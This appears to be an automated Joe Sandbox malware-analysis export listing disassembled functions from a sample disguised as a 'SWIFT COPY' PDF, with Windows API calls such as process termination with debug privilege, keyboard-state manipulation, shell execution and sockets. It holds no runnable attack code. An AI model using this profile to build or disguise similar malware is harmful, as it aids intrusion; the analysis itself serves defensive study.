                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: a757241974cf1dc7160832c75774cc1ef554d00546192fcb42cbc777c4a8c9b8
                                                                                    • Instruction ID: ab87956bd3036499d18dffc232a248e5fb24d81b87a63274602295bea2656625
                                                                                    • Opcode Fuzzy Hash: a757241974cf1dc7160832c75774cc1ef554d00546192fcb42cbc777c4a8c9b8
                                                                                    • Instruction Fuzzy Hash: 4A01FBB5255304BFEB10ABA5DC49F6B3BACEF89705F018411FA06CB5A1CA709800DB61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 554282083b3217f1889bd3f0ad303fe2427f6bd29e9db1216faa1d80e3964c24
                                                                                    • Instruction ID: c2689d52ec9863a58c7bbeefa7887242d00ed52a51a4ae9dea02e58edb6f1fcf
                                                                                    • Opcode Fuzzy Hash: 554282083b3217f1889bd3f0ad303fe2427f6bd29e9db1216faa1d80e3964c24
                                                                                    • Instruction Fuzzy Hash: 5FE1A4B2A00219ABDF14DFA4D885BEE77B9EF48314F14C52DF909AB281D770AD45CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 2862541840-625585964
                                                                                    • Opcode ID: 0bdfc35652d3ddacbcaa86347af4509943379611f223b8c4fa0143b686a5ad66
                                                                                    • Instruction ID: 533bfec58b9e194cf4c24b075207e6910d068d84739d6330605ac7c3e1caca01
                                                                                    • Opcode Fuzzy Hash: 0bdfc35652d3ddacbcaa86347af4509943379611f223b8c4fa0143b686a5ad66
                                                                                    • Instruction Fuzzy Hash: 8C919172A00219AFDF25CF95C844FAEB7B8EF85710F14C55AF519AB280DB749944CFA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00989B19
                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00989B2D
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00989B47
                                                                                    • _wcscat.LIBCMT ref: 00989BA2
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00989BB9
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00989BE7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 307300125-78025650
                                                                                    • Opcode ID: 5656b7cb3c4f97f07c9b3d9134622185b5bc9d8c7b3ecf0e016ad4f76e924f92
                                                                                    • Instruction ID: c0a0f171b4976835cc0766b55dc63d441c07fe60b6dbd4aacf05e6f7832d0bb4
                                                                                    • Opcode Fuzzy Hash: 5656b7cb3c4f97f07c9b3d9134622185b5bc9d8c7b3ecf0e016ad4f76e924f92
                                                                                    • Instruction Fuzzy Hash: FF41BE70A40308ABDB21AFA4DC85FEE77A8EF48354F14442AF589E7292D7759D84CB60
                                                                                    APIs
                                                                                      • Part of subcall function 00966532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00966554
                                                                                      • Part of subcall function 00966532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00966564
                                                                                      • Part of subcall function 00966532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009665F9
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0098179A
                                                                                    • GetLastError.KERNEL32 ref: 009817AD
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009817D9
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00981855
                                                                                    • GetLastError.KERNEL32(00000000), ref: 00981860
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00981895
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    • Opcode ID: 8c490732e259b4b3f32162396f50f443cf8d93f0c2432ea87679ff98b1514424
                                                                                    • Instruction ID: 3e21677818c14559acdfbad7f7aa141eeb3b0dd3f612a0697e0ecee74fe8cb4f
                                                                                    • Opcode Fuzzy Hash: 8c490732e259b4b3f32162396f50f443cf8d93f0c2432ea87679ff98b1514424
                                                                                    • Instruction Fuzzy Hash: E641BC71600200AFDB05EF54C8A6FADB7A9AF84310F048499FA069F3D2DB78A945CF91
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 009658B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    • Opcode ID: 3f768d2e1c4a418d6124a8e7bbaceee92093aa44414810ed2906018bc356c621
                                                                                    • Instruction ID: 26491e5e98e6ed4406b900291ebbe614b82820fcf505fd0d90141b7d4095e854
                                                                                    • Opcode Fuzzy Hash: 3f768d2e1c4a418d6124a8e7bbaceee92093aa44414810ed2906018bc356c621
                                                                                    • Instruction Fuzzy Hash: 72110A3524DB46BFE7055B549C82EAA279CAFA5324F21403BF601E7A81E7B4AA004665
                                                                                    APIs
                                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0096A806
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafeVartype
                                                                                    • String ID:
                                                                                    • API String ID: 1725837607-0
                                                                                    • Opcode ID: 13bf80833b65b782475129d3dcb5dc65dedbc9c12c9c25394010f490756636c5
                                                                                    • Instruction ID: 9678d7f8ec7750e416011f602cedcb0dc1c1543547a7bae21eedacc9f7ffdf0a
                                                                                    • Opcode Fuzzy Hash: 13bf80833b65b782475129d3dcb5dc65dedbc9c12c9c25394010f490756636c5
                                                                                    • Instruction Fuzzy Hash: 88C18A75A0521ADFDB00CF98C485BAEB7F5FF09315F20846AE606E7291D734AA81CF91
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00966B63
                                                                                    • LoadStringW.USER32(00000000), ref: 00966B6A
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00966B80
                                                                                    • LoadStringW.USER32(00000000), ref: 00966B87
                                                                                    • _wprintf.LIBCMT ref: 00966BAD
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00966BCB
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00966BA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                    • API String ID: 3648134473-3128320259
                                                                                    • Opcode ID: a3d9b6675b0c3980a53c6f691b20a84d671aae4d1f006c6985984fefde4b3037
                                                                                    • Instruction ID: 86a79dc40cba7091543d3d3d7e1554a2de37bf7aa36876325dce424d5f080f9c
                                                                                    • Opcode Fuzzy Hash: a3d9b6675b0c3980a53c6f691b20a84d671aae4d1f006c6985984fefde4b3037
                                                                                    • Instruction Fuzzy Hash: FA0131F6904208BFEB11ABA49D89EF7776CDB09304F0044A1B746E2451EA749E849FB1
                                                                                    APIs
                                                                                      • Part of subcall function 00983C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00982BF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharConnectRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 2595220575-0
                                                                                    • Opcode ID: 1a3fd1e20db824ce59d6784d309db38e849c3335ff37cfe3af467d32f5a71456
                                                                                    • Instruction ID: 9c21f9f5afe00c8c5094b6ca8c910883db2b233d2ea3400c0a4c2840508bbf52
                                                                                    • Opcode Fuzzy Hash: 1a3fd1e20db824ce59d6784d309db38e849c3335ff37cfe3af467d32f5a71456
                                                                                    • Instruction Fuzzy Hash: 34915975204211AFCB00EF54C891B6EBBE9FF88310F14885DF9969B2A2DB34E945DF42
APIs
• select.WSOCK32 ref: 00979691
• WSAGetLastError.WSOCK32(00000000), ref: 0097969E
• __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009796C8
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009796E9
• WSAGetLastError.WSOCK32(00000000), ref: 009796F8
• htons.WSOCK32(?,?,?,00000000,?), ref: 009797AA
• inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,009BDC00), ref: 00979765
  • Part of subcall function 0095D2FF: _strlen.LIBCMT ref: 0095D309
• _strlen.LIBCMT ref: 00979800
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
• String ID:
• API String ID: 3480843537-0
• Opcode ID: 843cead585b9e4be06fa3b6bc8a7ef34224e7d2834351146cf0581de046e6629
• Instruction ID: 3a65af3ab4933e24f46d5ddd890fbe0348f78cddc83a709bc8902be63028c8f8
• Opcode Fuzzy Hash: 843cead585b9e4be06fa3b6bc8a7ef34224e7d2834351146cf0581de046e6629
• Instruction Fuzzy Hash: F5818072508240ABC714EF64DC85F6FB7A9EFC5714F108A1DF5599B2A1EB30D904CB92
APIs
• __mtinitlocknum.LIBCMT ref: 0094A991
  • Part of subcall function 00947D7C: __FF_MSGBANNER.LIBCMT ref: 00947D91
  • Part of subcall function 00947D7C: __NMSG_WRITE.LIBCMT ref: 00947D98
  • Part of subcall function 00947D7C: __malloc_crt.LIBCMT ref: 00947DB8
• __lock.LIBCMT ref: 0094A9A4
• __lock.LIBCMT ref: 0094A9F0
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,009D6DE0,00000018,00955E7B,?,00000000,00000109), ref: 0094AA0C
• EnterCriticalSection.KERNEL32(8000000C,009D6DE0,00000018,00955E7B,?,00000000,00000109), ref: 0094AA29
• LeaveCriticalSection.KERNEL32(8000000C), ref: 0094AA39
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
• String ID:
• API String ID: 1422805418-0
• Opcode ID: 1b7d4127c481976624b8f0b37ec0a586f92e97a957394e1e8c30860210ab79a2
• Instruction ID: 667dd29dfa44ca8300eecc6380dbf819fe6753876c0fce5620e3e554a881a9f6
• Opcode Fuzzy Hash: 1b7d4127c481976624b8f0b37ec0a586f92e97a957394e1e8c30860210ab79a2
• Instruction Fuzzy Hash: 2A416C71A542069BEB14DFA8DA84F5CB7B5BF45335F108318E425AF2D2DBB49C40CB82
APIs
• DeleteObject.GDI32(00000000), ref: 00988EE4
• GetDC.USER32(00000000), ref: 00988EEC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00988EF7
• ReleaseDC.USER32(00000000,00000000), ref: 00988F03
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00988F3F
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00988F50
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0098BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00988F8A
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00988FAA
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 5772b8fdf79863910878508b3295a02401f5fa3583458492fdf726a29716e181
• Instruction ID: c90be449714814bbadabdf26630b129de8bec1a2f026e1b758b72ba43c2e4a77
• Opcode Fuzzy Hash: 5772b8fdf79863910878508b3295a02401f5fa3583458492fdf726a29716e181
• Instruction Fuzzy Hash: FA317C72215214BFEB109F60CC4AFEB3BADEF4A715F044065FE09DA291CAB59841DBB0
APIs
  • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
  • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
  • Part of subcall function 0093C6F4: _wcscpy.LIBCMT ref: 0093C717
• _wcstok.LIBCMT ref: 0097184E
• _wcscpy.LIBCMT ref: 009718DD
• _memset.LIBCMT ref: 00971910
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 0749334e8e982665e11a874f8672093b4359de07f528c77e0894fd32b9dcb57d
• Instruction ID: 0865df6b91b2973523b0d50dbaf1908313069a08ad89c9119dab8861a30d115e
• Opcode Fuzzy Hash: 0749334e8e982665e11a874f8672093b4359de07f528c77e0894fd32b9dcb57d
• Instruction Fuzzy Hash: 1CC17E716093519FC724EF28D895B9EB7E4BF85350F00892DF999972A2DB30ED05CB82
APIs
  • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
• GetSystemMetrics.USER32(0000000F), ref: 0099016D
• MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0099038D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009903AB
• InvalidateRect.USER32(?,00000000,00000001,?), ref: 009903D6
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009903FF
• ShowWindow.USER32(00000003,00000000), ref: 00990421
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00990440
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 3356174886-0
• Opcode ID: 8f9ec229271eb3d04728262f49c522557467525f3f5e9a713db7f597168206a6
• Instruction ID: 90fea2dc776c4f9184b11346ffc14e136e3039bb05733cf9bcd1188d8fd5deb0
• Opcode Fuzzy Hash: 8f9ec229271eb3d04728262f49c522557467525f3f5e9a713db7f597168206a6
• Instruction Fuzzy Hash: 2FA18C35600616AFDF18CF6CC9867BDBBB5BF88701F088115E869AA290D734AD50DB90
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0621211ec946a38d186c57481123d91130326f93dcbf01affde20479ac6aeb40
• Instruction ID: 342656dcd27cd22a13bdc6dcd820e635a022149e6f2d3656c3812fbe98ba713b
• Opcode Fuzzy Hash: 0621211ec946a38d186c57481123d91130326f93dcbf01affde20479ac6aeb40
• Instruction Fuzzy Hash: 97718CB0904109EFCF14CF98CC89AAEBB78FF85314F248149F955AB250C734AA41CFA5
APIs
• _memset.LIBCMT ref: 0098225A
• _memset.LIBCMT ref: 00982323
• ShellExecuteExW.SHELL32(?), ref: 00982368
  • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
  • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
  • Part of subcall function 0093C6F4: _wcscpy.LIBCMT ref: 0093C717
• CloseHandle.KERNEL32(00000000), ref: 0098242F
• FreeLibrary.KERNEL32(00000000), ref: 0098243E
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: eda9edd06ecd82185f29a1f37b76f1c7427f771234e7f59b6ff9530ac5929d10
• Instruction ID: 55f8d608b5ca4b0af18afcfdf5a40ef59c36dabe61e6444c8b08812bd3c9cf8d
• Opcode Fuzzy Hash: eda9edd06ecd82185f29a1f37b76f1c7427f771234e7f59b6ff9530ac5929d10
• Instruction Fuzzy Hash: 70716E75A006299FCF05EFA4D891AAEB7F5FF88710F108459E856AB391CB34AD40CF94
APIs
• GetParent.USER32(?), ref: 00963DE7
• GetKeyboardState.USER32(?), ref: 00963DFC
• SetKeyboardState.USER32(?), ref: 00963E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00963E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00963EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00963EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00963F13
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: dc321f3f1452690332e89cc4fd63281a60fddb46fbbb4b54aa1ced86170af1dc
• Instruction ID: fbd91a65f0c76363e60ec9f6d39eecf59dc5fb40a86e1c8a0089e55e5fed6709
• Opcode Fuzzy Hash: dc321f3f1452690332e89cc4fd63281a60fddb46fbbb4b54aa1ced86170af1dc
• Instruction Fuzzy Hash: 4B51C1A0A187D53EFB3643248C55BBA7EA95F06304F08C589F0D5468C3D3A9AEC4D760
APIs
• GetParent.USER32(00000000), ref: 00963C02
• GetKeyboardState.USER32(?), ref: 00963C17
• SetKeyboardState.USER32(?), ref: 00963C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00963CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00963CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00963D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00963D26
Memory Dump Source
